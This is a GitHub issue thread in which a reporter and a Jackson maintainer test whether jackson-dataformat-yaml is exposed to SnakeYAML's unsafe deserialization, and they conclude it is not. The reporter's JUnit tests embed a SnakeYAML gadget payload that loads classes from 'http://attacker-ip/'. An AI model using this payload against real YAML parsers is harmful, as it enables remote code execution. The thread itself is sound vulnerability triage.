### ISSUE TITLE
YAML: Allow usage of SafeConstructor

### ISSUE THREAD

**Issue by nictas** [FasterXML/jackson-dataformats-text#213]
By default, SnakeYAML can deserialize YAML to custom Java classes like `javax.script.ScriptEngineManager`. As a result, malicious code may be executed when parsing a YAML document. The vulnerability is described in great depth here:
https://medium.com/@swapneildash/snakeyaml-deserilization-exploited-b4a2c5ac0858

This can be avoided by using:
```
Yaml yaml = new Yaml(new SafeConstructor());
```
Instead of:
```
Yaml yaml = new Yaml();
```
However, I see no way of using this `SafeConstructor` through the `jackson-dataformat-yaml` library. Can you please add some configuration that would allow users to do so?

**Comment by cowtowncoder** [comment]
@nictas First of all, thank you for bringing this to our attention.

This module does not use any of databinding capabilities of SnakeYAML, but just event based reading, writing. As such I do not think this setting is relevant, unless I misunderstood some of processing that goes on.

If you can show how to make use of unsafe processing using `jackson-dataformat-yaml` I will definitely want to figure out how to block it, but I would first want to understand the attack vector.

**Comment by nictas** [comment]
Thanks for the quick response @cowtowncoder!

The problem can be reproduced with the following tests:
```
    private static final String UNSAFE_YAML = "test: !!javax.script.ScriptEngineManager [\n" + 
        "  !!java.net.URLClassLoader [[\n" + 
        "    !!java.net.URL [\"http://attacker-ip/\"]\n" + 
        "  ]]\n" + 
        "]";
    
    @Test
    public void testSafeConstructor() {
        assertThrows(Exception.class, () -> new Yaml(new SafeConstructor()).load(UNSAFE_YAML));
    }
    
    @Test
    public void testUnsafeConstructor() {
        new Yaml().load(UNSAFE_YAML);
    }
    
    @Test
    public void testJackson() throws JsonMappingException, JsonProcessingException {
        assertThrows(Exception.class, () -> new ObjectMapper(new YAMLFactory()).readValue(UNSAFE_YAML, Object.class));
    }
```
The first two pass successfully as expected, whereas the last one fails.

**Comment by nictas** [comment]
I just checked what happens and Jackson parses the malicious YAML as: `List<List<List<List<String>>>>`
```
    public static void main(String[] arguments) throws JsonMappingException, JsonProcessingException {
        Object result = new ObjectMapper(new YAMLFactory()).readValue(UNSAFE_YAML, Object.class);
        System.out.println(new ObjectMapper().writeValueAsString(result));
    }
```
The code fragment above prints:
```
{"test":[[[["http://attacker-ip/"]]]]}
```
I think this proves that there's no security vulnerability in `jackson-dataformat-yaml`, but I'll let you double check if you want and close this issue.

**Comment by cowtowncoder** [comment]
Jackson does see the (type) tags but does not apply them without POJO model indicating use of polymorphic type ids (either via `@JsonTypeInfo` annotation, or Default Typing).
Actual parsing uses lower level `ParserImpl`:

```java
       _yamlParser = new ParserImpl(new StreamReader(reader));
```

and not higher-level `Yaml` abstraction. So I think your findings make sense.

Also worth noting is that although type id could potentially be used if polymorphic types are enabled, this particular case probably would not succeed due to differences in requirements for Jackson to instantiate Java Objects (I think Yaml would find constructor by matching array of typed arguments) -- but if it did, it would fall under more general security described here:

https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062

(quite a few "gadget types" have been reported, but not `ScriptEngineManager`)

Actually, looking at `ScriptEngineManager`, I think the limitation is that delegating constructor in this case is simply not auto-detected.

I will close this issue for now, assuming it is not exploitable. May be reopened with more information.
